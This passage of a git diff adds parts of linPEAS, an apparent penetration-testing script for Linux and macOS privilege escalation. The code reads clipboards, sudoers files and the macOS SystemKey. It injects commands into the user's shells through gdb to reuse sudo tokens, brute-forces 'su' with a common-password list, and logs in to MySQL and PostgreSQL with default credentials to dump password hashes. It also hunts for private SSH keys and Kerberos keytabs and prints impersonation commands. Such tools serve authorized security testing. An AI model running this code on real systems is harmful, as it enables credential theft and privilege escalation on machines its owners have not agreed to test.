/var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + echo "" +fi + +#-- UI) PGP keys? +print_2title "Do I have PGP keys?" +command -v gpg 2>/dev/null || echo_not_found "gpg" +gpg --list-keys 2>/dev/null +command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" +netpgpkeys --list-keys 2>/dev/null +command -v netpgp 2>/dev/null || echo_not_found "netpgp" +echo "" + +#-- UI) Clipboard and highlighted text +if [ "$(command -v xclip 2>/dev/null)" ] || [ "$(command -v xsel 2>/dev/null)" ] || [ "$(command -v pbpaste 2>/dev/null)" ] || [ "$DEBUG" ]; then + print_2title "Clipboard or highlighted text?" + if [ "$(command -v xclip 2>/dev/null)" ]; then + echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + elif [ "$(command -v xsel 2>/dev/null)" ]; then + echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + elif [ "$(command -v pbpaste 2>/dev/null)" ]; then + echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + else echo_not_found "xsel and xclip" + fi + echo "" +fi + +#-- UI) Sudo -l +print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +(echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" +if [ "$PASSWORD" ]; then + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +fi +( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" +if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," +fi +for filename in '/etc/sudoers.d/*'; do + if [ -r "$filename" ]; then + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," + fi +done +echo "" + +#-- UI) Sudo tokens +print_2title "Checking sudo tokens" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; +fi +is_gdb="$(command -v gdb 2>/dev/null)" +if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; +else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; +fi +if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then + echo "Checking for sudo tokens in other shells owned by current user" + for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do + echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + if [ -f "/tmp/shrndom32r2r" ]; then + echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + break + fi + done + if [ -f "/tmp/shrndom32r2r" ]; then + rm -f /tmp/shrndom32r2r 2>/dev/null + else echo "The escalation didn't work... (try again later?)" + fi +fi +echo "" + +#-- UI) Doas +if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then + print_2title "Checking doas.conf" + doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) + if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then + cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," + else echo_not_found "doas.conf" + fi + echo "" +fi + +#-- UI) Pkexec policy +print_2title "Checking Pkexec policy" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" +(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" +echo "" + +#-- UI) Superusers +print_2title "Superusers" +awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Users with console +print_2title "Users with console" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done +else + no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) + unexpected_shells="" + printf "%s\n" "$no_shells" | while read f; do + if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" + fi + done + grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + if [ "$unexpected_shells" ]; then + printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + echo "Unexpected users with shells:" + printf "%s\n" "$unexpected_shells" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" + fi + done + fi +fi +echo "" + +#-- UI) All users & groups +print_2title "All users & groups" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +fi +echo "" + +#-- UI) Login now +print_2title "Login now" +(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Last logons +print_2title "Last logons" +(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Login info +print_2title "Last time logon each user" +lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + +EXISTS_FINGER="$(command -v finger 2>/dev/null)" +if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done +fi +echo "" + +#-- UI) Password policy +if [ "$EXTRA_CHECKS" ]; then + print_2title "Password policy" + grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" + echo "" + + if [ "$MACPEAS" ]; then + print_2title "Relevant last user info and user configs" + defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null + echo "" + + print_2title "Guest user status" + sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + echo "" + fi +fi + +#-- UI) Brute su +EXISTS_SUDO="$(command -v sudo 2>/dev/null)" +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + POSSIBE_SU_BRUTE=$(check_if_su_brute); + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) + printf "%s\n" "$SHELLUSERS" | while read u; do + echo " Bruteforcing user $u..." + su_brute_user_num "$u" $PASSTRY + done + else + printf $GREEN"It's not possible to brute-force su.\n\n"$NC + fi +else + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC +fi +print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/6_software_information.sh b/linPEAS/builder/linpeas_parts/6_software_information.sh new file mode 100644 index 0000000..3eb34f9 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/6_software_information.sh @@ -0,0 +1,628 @@ +########################################### +#--------) Software Information (---------# +########################################### + +#-- SI) Useful software +print_2title "Useful software" +for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done +echo "" + +#-- SI) Search for compilers +print_2title "Installed Compilers" +(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); +echo "" + +if [ "$(command -v pkg 2>/dev/null)" ]; then + print_2title "Vulnerable Packages" + pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" + echo "" +fi + +if [ "$(command -v brew 2>/dev/null)" ]; then + print_2title "Brew Installed Packages" + brew list + echo "" +fi + +if [ "$MACPEAS" ]; then + print_2title "Writable Installed Applications" + system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + done + + system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + done +fi + +#-- SI) Mysql version +if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then + print_2title "MySQL version" + mysql --version 2>/dev/null || echo_not_found "mysql" + echo "" + + #-- SI) Mysql connection root/root + print_list "MySQL connection using default root/root ........... " + mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) + if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + #-- SI) Mysql connection root/toor + print_list "MySQL connection using root/toor ................... " + mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) + if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + #-- SI) Mysql connection root/NOPASS + mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) + print_list "MySQL connection using root/NOPASS ................. " + if [ "$mysqlconnectnopass" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +#-- SI) Mysql credentials +if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then + print_2title "Searching mysql credentials and exec" + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" + fi + done + for f in $(find $d -name user.MYD 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + fi + done + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do + if [ -r "$f" ]; then + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + done + for f in $(find $d -name my.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "Found readable $f" + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + if [ "$mysqlexec" ]; then + echo "Found $mysqlexec" + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + fi + done +elif [ "$DEBUG" ]; then echo_not_found +fi +echo "" + +peass{MariaDB} + +peass{PostgreSQL} + +#-- SI) PostgreSQL brute +if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. +#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +peass{Mongo} + +peass{Apache} + +peass{Tomcat} + +peass{FastCGI} + +peass{Http_conf} + +peass{Htpasswd} + +peass{PHP Sessions} + +peass{Wordpress} + +peass{Drupal} + +peass{Moodle} + +peass{Supervisord} + +peass{Cesi} + +peass{Rsync} + +peass{Hostapd} + +peass{Wifi Connections} + +peass{Anaconda ks} + +peass{VNC} + +peass{Ldap} + +peass{OpenVPN} + +#-- SI) ssh files +print_2title "Searching ssl/ssh files" +if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi +sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" +hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" +hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" +writable_agents=$(find $folder_path -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')') + +peass{SSH} + +grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," + +if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) +fi + +if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then + echo "" + print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi + echo "" +fi +if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" + printf "$certsb4_grep\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" +fi +if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" + echo "" +fi +if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" +fi +if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then + print_3title "Listing SSH Agents" + ssh-add -l + echo "" +fi +if gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"; then + print_3title "Listing gpg keys cached in gpg-agent" + gpg-connect-agent "keyinfo --list" /bye + echo "" +fi +if [ "$writable_agents" ]; then + print_3title "Writable ssh and gpg agents" + printf "%s\n" "$writable_agents" +fi +if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" +fi +if [ "$hostsdenied" ]; then + print_3title "/etc/hosts.denied file found, read the rules:" + printf "$hostsdenied\n" + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + echo "" +fi +if [ "$hostsallow" ]; then + print_3title "/etc/hosts.allow file found, trying to read the rules:" + printf "$hostsallow\n" + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi +if [ "$sshconfig" ]; then + echo "" + echo "Searching inside /etc/ssh/ssh_config for interesting info" + grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," +fi +echo "" + +peass{PAM Auth} + +#-- SI) Passwords inside pam.d +pamdpass=$(grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#") +if [ "$pamdpass" ] || [ "$DEBUG" ]; then + print_2title "Passwords inside pam.d" + grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi + +peass{NFS Exports} + +#-- SI) Kerberos +kadmin_exists="$(command -v kadmin)" +klist_exists="$(command -v klist)" +if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then + print_2title "Searching kerberos conf files and tickets" + print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" + + if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi + if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi + ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" + if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; + else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; + fi + + printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do + if [ -r "$f" ]; then + if echo "$f" | grep -q .k5login; then + echo ".k5login file (users with access to the user who has this file in his home)" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + elif echo "$f" | grep -q keytab; then + echo "" + echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && echo "$l" | grep -q "@"; then + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" + #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + fi + done + elif echo "$f" | grep -q krb5.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; + elif echo "$f" | grep -q kadm5.acl; then + ls -l "$f" + cat "$f" 2>/dev/null + elif echo "$f" | grep -q sssd.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; + elif echo "$f" | grep -q secrets.ldb; then + echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + elif echo "$f" | grep -q .secrets.mkey; then + echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + fi + fi + done + ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" + klist 2>/dev/null || echo_not_found "klist" + echo "" + +elif [ "$DEBUG" ]; then echo_not_found +fi + +peass{Knockd} + +peass{Kibana} + +peass{Elasticsearch} + +##-- SI) Logstash +print_2title "Searching logstash files" +if [ "$PSTORAGE_LOGSTASH" ] || [ "$DEBUG" ]; then + printf "$PSTORAGE_LOGSTASH" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then + echo "Logstash is running as user:" + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," + fi + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," + done +elif [ "$DEBUG" ]; then echo_not_found +fi +echo "" + +#-- SI) Vault-ssh +if [ "$PSTORAGE_VAULT_SSH_HELPER" ] || [ "$DEBUG" ]; then + print_2title "Searching Vault-ssh files" + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done + echo "" + vault secrets list 2>/dev/null + printf "%s\n" 